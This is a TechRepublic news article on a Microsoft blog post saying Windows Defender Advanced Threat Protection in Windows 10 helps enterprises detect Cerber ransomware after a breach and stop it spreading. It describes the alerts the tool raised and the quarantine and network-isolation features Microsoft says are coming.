Windows 10 could help enterprises more quickly detect and stop the further spread of a ransomware infection, a recent Microsoft blog post said. The post, published Monday, claims that Windows Defender Advanced Threat Protection (ATP) helps businesses better understand early cases, and use that information to protect their network.
Much like a physical illness, catching a cybersecurity infection early is key to mitigating potential damage and avoiding complex problems. If a ransomware attack is perpetrated, there are steps that an enterprise can take to limit the complications.
“As attacks reach the post-breach or post-infection layer–when endpoint antimalware fails to stop a ransomware infection–enterprises can benefit from post-breach detection solutions that provide comprehensive artifact information and the ability to quickly pivot investigations using these artifacts,” the post said.
SEE: Cybersecurity spotlight: The ransomware battle (Tech Pro Research)
The research cited in the blog post said that some of the more prevalent families of ransomware campaigns can last for “days or even weeks, all the while employing similar files and techniques.” But, if the affected business can investigate what the blog called “patient zero,” or the initial infection, they can “effectively stop ransomware epidemics,” the post said.
That means if an antimalware tool fails to prevent the actual attack in the first place, Windows 10 should be able to prevent it from growing further and turning into an epidemic. It is able to do so because Windows Defender ATP can point out the original infections and work to help protect the network and stop the subsequent attacks, the post said.
The research looked specifically at a type of malware known as Cerber ransomware, which was particularly prevalent during the holiday season. During the test, Cerber ransomware was downloaded and, when it tried to launch a PowerShell command, it was detected by Windows Defender ATP.
“Windows Defender ATP also generated an alert when the PowerShell script connected to a TOR anonymization website through a public proxy to download an executable,” the post said. “Security operations center (SOC) personnel could use such alerts to get the source IP and block this IP address at the firewall, preventing other machines from downloading the executable.”
Additionally, Windows Defender ATP also generated alerts when the ransomware tried to delete system restore points and volume shadow copies. According to the post, more updates are coming that will enable “network isolation of compromised machines,” and the ability to “quarantine and prevent subsequent execution of files.”
The 3 big takeaways for TechRepublic readers
- According to Windows researchers, Windows 10 can help prevent a ransomware infection from turning into a full-on epidemic.
- Windows Defender Advanced Threat Protection (ATP) picks up artifact information from patient zero to understand the ransomware family and alert security professionals.
- Future updates will add quarantine capabilities and network isolation as well.